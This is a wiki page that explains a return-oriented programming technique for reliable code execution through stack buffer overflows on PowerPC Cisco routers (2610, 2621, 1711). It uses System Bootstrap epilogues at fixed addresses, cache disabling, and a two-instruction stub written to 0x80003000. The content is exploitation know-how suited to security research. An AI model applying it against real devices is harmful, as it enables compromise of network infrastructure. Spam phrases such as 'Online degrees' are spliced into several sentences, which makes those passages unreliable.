Reliable Code Execution of Stack Based Buffer Overflows on PowerPC

RSS

Modified: Thu, 14 Jan 2010 13:25 by alexlobsters - Categorized as: Advanced topics, Exploitation, Tips and Tricks

» Reliable Code Execution of Stack Based Buffer Overflows on PowerPC

Edit

Summary

The method relies on the System Bootstrap code sections found on PowerPC based access level routers. The location of the System Bootstrap code is stable and only around 10 different System Bootstrap versions are known to be installed widely on the affected devices with the one version of the largest population covering over half of all devices total.Online degrees

The method has been shown to work against Cisco 2610, 2621 and 1711 routers.

On the Cisco 2600 platform, the most common System Bootstrap is Version 11.3(2)XA4.

Edit

Limitations

This method is only applicable to stack based buffer overflow vulnerabilities. It may be applied to other exploits if they control the area around the stack pointer.

The method also requires a relatively large amount of data to be written to the stack. A buffer overflow of approximately 192 bytes is sufficient.

The method can be made 0x00-byte free, making it suitable to string based overflows.

Edit

Description

Given a stack based buffer overflow, one can achieve arbitrary code execution by returning into function epilogues of existing code at known addresses. This method has a different names, but is mostly referred to as "code chunk borrowing" or "return oriented programming" (see this presentation).

Before the stack saved Link Register (LR) is restored from the stack, the upper PowerPC registers (R31, R30, ...) are restored, allowing to take control over them.Online cyber crime degree

The System Bootstrap code is placed on the respective platforms at 0xFFF00000 and onward. This code location is stable and allows to return to function epilogues here. The inspected version Version 11.3(2)XA4 exhibits at least one function epilogue that allows an arbitrary memory write using upper registers (R29-R31). Additionally, this function also restores the registers in question, allowing to chain returns into this function and hereby writing multiple 32Bit values into arbitrary locations in memory.Term papers

Another function in the code region of the System Bootstrap code must be chained into the stack layout in order to disable the PowerPC Data and Instruction Caches, as both are independent from each other and prevent writing code followed by executing it. This function can be found early in the Reset Vector handler.Online biology degree

Using the arbitrary memory write coupled with the cache disabling function, the overflow can write two instructions into a known location and jump to it. A possible sequence is:


mtctr %sp

bctr

An appropriate location to write to is the memory region 0x80003000, which is where the exception handler dissertation code is stored after the MMU is turned on. This area is writable and executable as well as image version independent.chemistry degree
Administration Degree

Full Exploit

IOS Crash Analysis and Rootkit Wiki

Navigation

Reliable Code Execution of Stack Based Buffer Overflows on PowerPC

Summary

Limitations

Description